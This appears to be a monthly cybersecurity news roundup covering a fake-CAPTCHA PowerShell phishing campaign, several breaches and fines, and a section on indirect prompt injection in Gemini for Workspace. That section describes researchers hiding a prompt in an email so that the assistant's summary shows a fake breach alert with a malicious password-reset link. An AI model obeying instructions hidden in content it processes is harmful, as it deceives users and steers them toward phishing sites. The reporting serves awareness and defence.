This month, the cybersecurity landscape has been particularly dynamic. From a novel phishing campaign targeting GitHub users with PowerShell to vulnerabilities in Google’s AI assistant, Gemini, the realm of cybersecurity continues to present new challenges. We also saw a significant cyberattack on Russia’s state media on Putin’s birthday and a major data breach at MoneyGram. Meanwhile, Meta faced a hefty fine for storing passwords in plain text, and former Kaspersky users were surprised by an unexpected software switch.
New/Improved Techniques
PowerShell Phishing
A recent phishing campaign has been targeting GitHub users with a novel approach that leverages PowerShell to download password-stealing malware. The phishing email, disguised as a security alert from GitHub prompts users to verify their humanity by solving a CAPTCHA. This CAPTCHA, however, is a ruse that instructs users to press a series of keyboard keys, ultimately triggering a PowerShell command that downloads and executes a malicious file named “l6e.exe”.
The attack manipulates a browser function that allows it to interact with the system’s clipboard (the ‘copy’ function) to write specific content into the clipboard. The user is directed by the fake CAPTCHA to follow a series of keystrokes, that ultimately has them open the Windows Run function, paste in the content from their clipboard, and then press enter. The function pasted in to Run will then utilise PowerShell to reach out to a malicious URL to install the malware.
The malware, identified as Lumma Stealer, is designed to steal credentials stored on the victim’s PC. While this specific campaign is unlikely to trick more experienced users, it poses a significant threat to less tech-savvy users who might not recognize the danger of executing such commands.
Google Gemini for Workspace: Prompt Injection
Recent investigations have revealed that Google’s Gemini for Workspace, an AI assistant integrated into various Google products, is vulnerable to indirect prompt injection attacks. These attacks allow malicious actors to manipulate the assistant into generating misleading or unintended responses, raising concerns about the reliability of the information produced by Gemini.
Researchers from Hidden Layer demonstrated that attackers could embed malicious prompts in emails or documents. When Gemini processes these prompts, it can produce responses that include fake alerts or instructions to visit malicious websites. In perhaps the most egregious example, the researchers were able to hide a prompt within an email, and when Jemini was asked to summarise the content of this email, it responded by following the malicious prompt, and displaying a message to the user indicating that their account was breached – even including a malicious URL in the response that the user could follow to ‘reset their password’.
Despite these findings, Google has classified these vulnerabilities as “intended behaviours,” indicating that the company does not view them as security issues. However, the potential for misuse highlights the importance of vigilance when using AI-powered tools and the need for robust security measures to protect against such attacks.
Attacks / Threats
[RU] Hack Disrupts Russian State Media on Putin’s Birthday
A significant cyberattack attributed to a Ukrainian-linked hacker group, “sudo rm-RF,” has crippled the online operations of Russia’s state broadcaster VGTRK on Vladimir Putin’s 72nd birthday. This unprecedented attack disabled not only the broadcaster’s online services but also affected several internal functions. Kremlin spokesperson Dmitry Peskov confirmed the incident and stated that specialists are investigating the source of the attack.
While Kyiv has not officially claimed responsibility, a Ukrainian official hinted that the hackers executed a “large-scale attack” as a form of congratulation to Putin. Major channels, including Rossiya-1 and Rossiya-24, were impacted, with viewers receiving a “503 Service Unavailable” error message.
The attack comes amid heightened tensions in the ongoing Russia-Ukraine conflict, with Russian officials characterizing the incident as part of a broader “hybrid war” waged by the West. Maria Zakharova, spokesperson for the Russian foreign ministry, indicated that Russia plans to address this cyber incident in international forums.
[Global] MoneyGram Data Breach
The second largest global money transfer service MoneyGram experienced a significant cyberattack that compromised sensitive customer data, and led to a five-day outage as MoneyGram took its systems offline to mitigate the damage and investigate the incident. The outage disrupted transactions and caused significant inconvenience to customers worldwide.
MoneyGram are yet to disclose the exact number of affected individuals, but the impact is believed to be extensive given the company’s global reach. It is believed that the unauthorized third party gained accessed to MoneyGram’s network via social engineering, targeting the internal IT helpdesk by impersonating an employee. The malicious actor used their access to steal a variety of personal information, including names, bank account numbers, transaction details, contact information, dates of birth, Social Security numbers, and copies of government-issued IDs.
Initially, MoneyGram referred to the incident as a network outage, but later confirmed it was a cybersecurity issue. MoneyGram were lucky in this instance, as while a significant amount of data was exfiltrated, there have been no signs of ransomware discovered on their systems. In response to the incident, MoneyGram has offered affected U.S. customers two years of free identity protection and credit monitoring services. The company has also advised customers to monitor their credit reports and account statements for any suspicious activity.
Naughty List
Meta Fined for Storing Passwords in Plain Text
Meta has been fined €91 million (approximately $102 million) by the Irish Data Protection Commission (DPC) for storing millions of Facebook and Instagram passwords in plain text. This significant fine follows a five-year investigation into a 2019 incident where Meta’s internal systems logged user passwords in a readable format.
The investigation revealed that these plaintext passwords were accessible to around 2,000 Meta engineers, who queried the database over 9 million times. Despite Meta’s assurances that there was no evidence of improper access or misuse of the passwords, the DPC concluded that Meta failed to implement adequate security measures to protect user data.
Passwords should be stored securely using countermeasures to protect them if the database is breached. This can be done by using techniques such as cryptographic hashing and salting, to prevent unauthorized access.
Mozilla – Tracking Users Without Consent
European digital rights group NOYB (None Of Your Business) has lodged a privacy complaint with Austria’s data protection authority against Mozilla, claiming the company is improperly using a feature called “Privacy-Preserving Attribution” (PPA) to track users without their consent. Announced in February and automatically enabled in Firefox version 128, released in July of this year, PPA was intended to measure ad performance without collecting personal data. However, NOYB argues that the feature allows Mozilla to track user behaviour across websites, undermining user privacy.
NOYB asserts that Mozilla activated PPA by default without consulting users, effectively turning the browser into an ad measurement tool rather than empowering users to control tracking themselves. The group contends that while PPA may be less invasive than traditional cookie tracking, it still infringes on user rights under the EU’s General Data Protection Regulation (GDPR). Felix Mikolasch, a data protection lawyer at NOYB, criticized Mozilla for adopting a narrative that justifies user tracking, suggesting that PPA is merely a new method of monitoring rather than a true improvement in privacy.
Mozilla maintains that PPA does not involve sharing browsing data with third parties and emphasizes that advertisers receive only aggregated data about ad effectiveness. Users have the option to disable the PPA feature through the browser’s settings. A Mozilla spokesperson acknowledged the need for better engagement with external voices regarding online advertising and expressed a commitment to clarifying their approach moving forward.
Kasperky Self-Removal Automatically Installs UltraAV
Former users of Kaspersky antivirus have expressed surprise and concern after the software reportedly deleted itself and installed UltraAV without prior warning. This change follows the U.S. government’s decision to add Kaspersky to its Entity List, banning the company from sales and software updates in the U.S. starting September 29, 2024. While Kaspersky claimed to have notified customers about the transition to UltraAV at the beginning of September, many users reported a lack of information regarding the timing and process of this switch.
User reactions on Kaspersky’s support forums and Reddit indicate that the automated installation of UltraAV was unexpected, with some users also finding UltraVPN installed alongside it. UltraAV, developed by the U.S.-based Pango Group, promises features like core malware protection, zero-day threat detection, and data theft protection. However, there is little information available about the antivirus’s performance, as user reviews are scarce and no independent testing results have been published yet.
As former Kaspersky users grapple with this unexpected transition, concerns about the effectiveness of UltraAV remain. PCMag’s Lead Analyst, Neil J. Rubenking, noted that users who relied on Kaspersky may rightfully question the quality of protection offered by UltraAV, especially with independent test scores yet to be released. As reviews are still forthcoming, the impact of this sudden change on users’ cybersecurity remains uncertain.
Jokers Stash: operator indited 3 years after takedown
The U.S. government has launched a significant crackdown on cybercrime, announcing sanctions and indictments against Timur Kamilevich Shakhmametov who allegedly operated Joker’s Stash, a notorious online marketplace for stolen payment cards. This platform, which operated since late 2014, was linked to major data breaches involving retailers like Saks Fifth Avenue and Hilton Hotels, affecting millions of consumers.
Joker’s Stash distinguished itself by offering a reliable source of stolen cards, claiming to sell only those directly obtained by its own hackers. The site catered to high-volume buyers, including street gangs, and provided incentives like loyalty programs and money-back guarantees. Shakhmametov, initially known as “v1pee,” had built a reputation on Russian hacking forums and participated in various high-stakes fraud schemes.
The DOJ estimates that Joker’s Stash generated revenues between $280 million and over $1 billion, reflecting the fluctuating prices of bitcoin and the volume of stolen goods sold. The site closed in January 2021 following law enforcement actions and health issues related to COVID-19. This indictment highlights the U.S. government’s ongoing efforts to combat cybercrime, and the challenges posed by evolving digital fraud enterprises.